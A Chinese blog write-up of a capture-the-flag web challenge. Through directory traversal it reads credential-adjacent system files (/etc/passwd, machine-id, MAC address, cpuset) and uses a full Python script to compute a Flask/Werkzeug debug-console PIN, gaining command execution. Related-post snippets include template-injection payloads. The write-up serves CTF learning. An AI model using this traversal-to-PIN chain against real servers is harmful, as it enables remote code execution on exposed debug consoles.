HSCSEC CTF 2023 web-EZSYFLASK-wp

最新推荐文章于 2024-04-06 03:00:36 发布
最新推荐文章于 2024-04-06 03:00:36 发布
阅读量266 收藏
点赞数
分类专栏: CTF 文章标签: linux flask 网络安全 web安全 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44558805/article/details/129197003
版权

审题

打开环境,根据提示访问页面,看到过滤掉了cgroup、flag、self

让页面报错,发现console是开启的

然后就是需要一个PIN码

get请求可以进行目录穿越,接下来就是要根据文件得到的内容去生成PIN码

  1. username(/etc/passwd)

  1. app.py路径(页面报错获得)

  1. mac address(/sys/class/net/eth0/address或/sys/class/net/ens33/address)

  1. machine-id(/etc/machine-id)

  1. cpuid(/proc/self/cgroup)这里题目ban了self和cgroup,可以换(/proc/1/cpuset)具体原因可以参考这篇文章->在这里

username获取

得到app

app.py路径获取

得到/usr/local/lib/python3.8/site-packages/flask/app.py

mac address获取

这里要注意需要对address进行处理

addr = '02:42:ac:02:0b:64'
print(int(addr.replace(':', ''), 16))

得到2485376912228

machine-id获取

得到7265fe765262551a676151a24c02b7b6

cpuid获取

得到cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114

machine-id拼接cpuid

7265fe765262551a676151a24c02b7b6cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114

跑脚本得到PIN码,脚本可以网上随便找,我用的是

import hashlib
from itertools import chain
probably_public_bits = [
    'app',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485376912228',# str(uuid.getnode()),  /sys/class/net/eth0/address
    '7265fe765262551a676151a24c02b7b6cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114'# get_machine_id(), /etc/machine-id
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num

print(rv)

生成PIN:155-314-265

进入console

导入os,执行系统命令,这里傻了一下,一开始没注意到后面的+号。flag文件怎么都读不出东西……

真的flag在readflag文件里……

得到flag

HSCSEC{45035c7e-1eb5-452f-8356-2fc000e3d2b4}

y1Fan_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
每日练习-[HZNUCTF 2023 preliminary]flask
m0_68113265的博客
08-20 293
页面内容要求get一个name经过测试,只对语句进行倒序。查到os在132同时flag不在flag文件中。猜测flag在env中。
HZNUCTF2023初赛
Emmaaaaa's blog
03-27 1005
cpdd:摩斯密码 classical:base + 凯撒 child_OTP:异或 child_quadratic_residue:直接开根法 child_proof_work:暴力破解uuid4{8位 - 4位 - 4位 - 12位} chile_steam:异或 child_RSA:基础RSA解密 RSA1:维纳攻击 很简单的数学1:离散对数(discrete_log) child_gcd:费马小定理 (a ** (p-1) = 1 mod p) RSA3:模运算法则,离散对数
NSSCTF-[HZNUCTF 2023 preliminary]-web
J1ng_Hong的博客
11-13 420
进题发现没有回显,我试着用dirsearch,发现找到的三个网页都是没有回显的。进题看到输入框,并且下面的提示看起来想sql注入,随便输了几次,发现只有数字1、2、3、4有回显,并且输入会逆向。它最后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。由于序列化中的b代表着Boolean,所以我试着把0改为1。然后我们就看到了回显,但是没找到flag。
[HFCTF 2021 Final]easyflask
weixin_43610673的博客
06-20 1637
任意文件读取,根据提示读取源码 #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type('User', (object,), { 'uname'
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp
Jay17的博客
08-16 1222
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CtfHub-wpweb
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
HZNUCTF-ezflask
qq_44640313的博客
03-27 560
jinja2的注入
NUAACTF - Web - Ez_Flask
1tachi的博客
12-27 592
按照提示随便传一个:?name=123 可能存在模板渲染,检测一下:?name=${2*7} ?name={{7*7}} ?name={{7*'7'}} 发现是 jinja2 渲染 看一下所有的类:?name={{[].__class__.__base__.__subclasses__()}} 可以一点一点的往下找,也可以直接写payload {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ ==.
ctfWEB练习三
渗透测试研究中心
12-15 3052
题目名称:Simple_SSTI_2题目wirteup:启动题目场景,获得靶场网站,访问网站,页面显示url连接需要连接一个 flag参数http://114.67.246.176:19131/根据题目内容,该题是一个ssti漏洞,这里构造ssti,参数构造flag={{3+2}},报错,且是flaskhttp://114.67.246.176:19131/?flag={{3+2}}又尝试构造f...
HSCCTF 3th 2024 Web方向 题解wp
Jay17的博客
03-11 1455
HSCCTF 3th 2024 Web方向 题解wp
HZNUCTF2023 web
weixin_63231007的博客
05-07 1366
HZNUCTF校赛 赛后复现
HZNUCTF2023部分wp-Reverse
m0_73393932的博客
04-04 705
逆向
红客突击队HSC-1th CTF大赛个人Writeup
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
02-23 2785
本届HSC1th 2022是由社会战队红客突击队(Honker Security Commando)举办。 本次比赛将采用在线网络安全夺旗挑战赛的形式,涵盖web,crypto,misc,re等主流方向,并面向全球开放。比赛三甲可获突击队周边礼品。 前20有纸质证书,每次感觉再解一道题就进前20了,结果等我做出来一看排名基本没变,甚至还掉了。。。大佬们太强了。 结果最后居然被我候补末班上车,刚好前20。在此记录一下个人解题过程,做的都是简单题,还有好多是歪门邪道解出来的,还是太菜了。。。 Web CLICK
PolarD&N-CTF-web方向-困难_polard&n 没人能拒绝猫猫 ctf
最新发布
m0_61068088的博客
04-06 673
然后就得到了flag。
flask–通过算pin码进入控制台
wikey 的博客
03-31 593
那么首先尝试能不能读取到环境变量的内容–(/proc/self/environ是Linux下中的一个文件,这个文件里保存了系统的一些变量。flask在开启debug模式下,可以通过输入pin码进行代码调试模式,也就是console控制台。进入题目首先知道两个信息–框架是flask–首先考虑是不是存在ssti第二个是题目描述中的信息(开启了debug模式)好的我们现在知道第一个有用信息就是,最后的flag位置位于环境变量中。这个其实往往都是默认的,但是还是演示一下。很多都是默认的,重点需要关注三个东西。
CTF-工具相关的总结 还不错
10-29
本篇文章将围绕CTF-工具相关的话题进行总结介绍。主要涵盖的内容有工具总结、各种工具的使用方法以及一些实用技巧。其中的主要工具包括.idea、VS code、Python、Flask、Node.js、Docker、PhpStorm、PIP、Node.js、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值